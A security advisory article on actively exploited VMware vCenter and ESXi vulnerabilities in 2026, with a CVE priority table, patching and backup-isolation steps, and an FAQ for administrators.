VMware vCenter and ESXi Under Active Attack: The 2026 Patch Priority
CISA confirms exploited flaws in VMware vCenter and ESXi, with ransomware crews chaining ESXi bugs to encrypt entire virtual estates.

VMware's virtualization stack runs an enormous share of the world's server workloads, which makes its vulnerabilities a high-value target. In early 2026, CISA confirmed active exploitation across both vCenter Server and ESXi, including ESXi flaws now used in ransomware campaigns to encrypt entire virtual estates at once. For anyone running a VMware environment, these belong at the top of the patch queue, ahead of routine maintenance.
Quick answer
CISA confirmed active exploitation across both vCenter and ESXi in early 2026. The vCenter flaw CVE-2024-37079 is a pre-auth remote code execution bug; the ESXi flaw CVE-2025-22225 is now used in ransomware to encrypt whole virtual estates at once. Inventory every vCenter and ESXi build number against Broadcom's advisories (version family is not enough), patch the KEV-listed CVEs first, get management interfaces off the internet, and keep at least one immutable offline backup a compromised host cannot reach.
Key takeaways
- CISA added a critical vCenter Server flaw (CVE-2024-37079, an out-of-bounds write in the DCERPC implementation) to its Known Exploited Vulnerabilities catalog; it allows unauthenticated remote code execution from a crafted network packet.
- CVE-2025-22225, an arbitrary-write flaw in ESXi, is confirmed in active ransomware use, with CISA updating its KEV entry to reflect that.
- The ESXi bugs (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226) have reportedly been chained in zero-day attacks since at least early 2024.
- Federal agencies faced KEV remediation deadlines (vCenter by February 13, 2026 under BOD 22-01); private organizations should treat those as urgent guidance.
- A compromised hypervisor is catastrophic: encrypting ESXi can take down every virtual machine on a host simultaneously, so backup isolation matters as much as patching.
Why hypervisor bugs are a worst case
A vulnerability in vCenter or ESXi is not like a flaw in one application. vCenter manages your whole virtual fleet, and ESXi is the platform every VM runs on. Compromise either and an attacker can reach across many workloads at once. Ransomware groups have figured this out: rather than encrypting machines one by one, they target ESXi directly and encrypt all the virtual disks on a host in a single stroke. That is why the confirmed ransomware use of CVE-2025-22225 is so alarming.
The vCenter flaw, CVE-2024-37079, is an out-of-bounds write in the DCERPC protocol implementation. An attacker with network access can send specially crafted packets to achieve remote code execution without authenticating first, exactly the kind of pre-auth RCE that gets weaponized fast.

What CISA and Broadcom have confirmed
Warning
CISA's Known Exploited Vulnerabilities catalog is the authoritative signal here. When a VMware CVE lands in KEV, it means real-world exploitation has been observed, not theoretical risk. Patch those first.
- vCenter, CVE-2024-37079: added to KEV with a February 13, 2026 federal remediation deadline under Binding Operational Directive 22-01. Broadcom warned of in-the-wild exploitation.
- ESXi, CVE-2025-22225: arbitrary-write flaw, KEV entry updated to reflect ransomware exploitation in early February 2026.
- ESXi chain, CVE-2025-22224 / 22225 / 22226: patched by Broadcom in March 2025; reportedly chained in targeted zero-day attacks since early 2024.
Always confirm the exact affected builds against Broadcom's VMware security advisories for your version, because fixed builds differ across ESXi, vCenter, Workstation, and Fusion.
For a fast triage, here are the flaws that matter most and where they sit:
| CVE | Component | Type | Status |
|---|---|---|---|
| CVE-2024-37079 | vCenter Server | Out-of-bounds write, pre-auth RCE | KEV, federal deadline Feb 13, 2026 |
| CVE-2025-22225 | ESXi | Arbitrary write | KEV, confirmed ransomware use |
| CVE-2025-22224 | ESXi | Heap overflow | Patched Mar 2025, chained in attacks |
| CVE-2025-22226 | ESXi | Information disclosure | Patched Mar 2025, chained in attacks |
Patch top to bottom: the two KEV-listed entries with confirmed exploitation come first, then verify the March 2025 ESXi chain is actually applied on every host.
What to do now
- Inventory and match versions. List your vCenter and ESXi builds and check each against the relevant Broadcom advisory to confirm whether it is vulnerable.
- Patch the KEV items first. Prioritize CVE-2024-37079 (vCenter) and CVE-2025-22225 (ESXi) and the related ESXi chain, these have confirmed exploitation.
- Reduce management exposure. vCenter and ESXi management interfaces should never face the public internet. Put them behind a segmented management network and restrict access tightly.
- Protect backups from the hypervisor. Keep at least one immutable, offline copy that a compromised ESXi host cannot reach or encrypt, the approach in our 3-2-1-1-0 backup guide.
- Hunt for compromise. Review ESXi shell access, unexpected processes, and vCenter authentication logs for activity predating your patch.
Edge-to-hypervisor is a common ransomware path: an exploited VPN or firewall gives initial access, then attackers pivot to ESXi for maximum impact. Pair this with hardening on your perimeter devices, such as the steps in our coverage of the SonicWall SSL VPN mass exploitation.
Why "patched in 2025" is not the same as "safe"
A surprising number of breached environments had the right patch available and even believed it was applied. Two gaps explain most of those cases. First, version family is not build number: an ESXi host can sit in a "patched" major version while running a build that predates the fix, because someone updated the cluster unevenly or rolled one host back. Second, lateral compromise that happened before patching does not undo itself; if an attacker reached the ESXi shell while you were vulnerable, the fix closes the hole but leaves whatever they planted behind.
That is why the response has to be inventory-first and assume-breach. Confirm the exact build on every single host against the Broadcom advisory, not a representative sample, and then go looking for signs someone already had access rather than assuming the patch ended the story.
What to do tonight
If you run any VMware estate, do not let this wait for the next change window:
- Export a list of every ESXi and vCenter build number and compare each against the specific Broadcom advisory, not the version family.
- Patch the KEV-listed CVEs first: CVE-2024-37079 on vCenter and CVE-2025-22225 on ESXi, plus the March 2025 ESXi chain.
- Get every management interface off the public internet and behind a segmented, access-controlled network.
- Confirm you hold at least one immutable, offline backup copy a compromised ESXi host cannot reach or encrypt.
- Review ESXi shell access, unexpected processes, and vCenter authentication logs for activity that predates your patch, and treat any finding as an incident.
Frequently asked questions
I patched ESXi in 2025. Am I covered for the 2026 ransomware activity?
The March 2025 Broadcom patches fixed CVE-2025-22224/22225/22226. If you applied them and confirmed the fixed build, you closed those flaws. The 2026 news is that exploitation of CVE-2025-22225 expanded into ransomware, a reason to verify you actually patched, not a new bug for already-patched hosts.
Can these flaws be exploited from the internet directly?
vCenter's CVE-2024-37079 requires network access to the vCenter service. If your management plane is internet-exposed, the risk is severe; if it is properly segmented, the attacker must first gain internal access. Either way, patch, but exposure dramatically raises urgency.
Why is ESXi such a popular ransomware target?
Encrypting an ESXi host can lock every virtual machine running on it at once, maximizing damage from a single action. That efficiency is exactly why ransomware crews invest in hypervisor exploits.
How do I know if my build is fixed?
Compare your exact ESXi or vCenter build number against the fixed builds listed in the specific Broadcom VMware security advisory for that CVE. Version family alone is not enough, the build number is what matters.
The bottom line
VMware's vCenter and ESXi are under confirmed active attack in 2026, and the ESXi flaws are already feeding ransomware that can encrypt an entire virtual estate in one move. Inventory your builds, patch the KEV-listed CVEs first, get management interfaces off the internet, and keep an immutable backup copy the hypervisor cannot touch.
Sources & further reading
- cisa.gov/known-exploited-vulnerabilities-catalog
- bleepingcomputer.com/news/security/cisa-vmware-esxi-flaw-now-exploited-in-ransomware-attacks/
- helpnetsecurity.com/2026/02/05/cisa-cve-2025-22225-ransomware-exploitation/
- theregister.com/2026/01/23/critical_vmware_vcenter_server_bug/
- broadcom.com/support/vmware-security-advisories


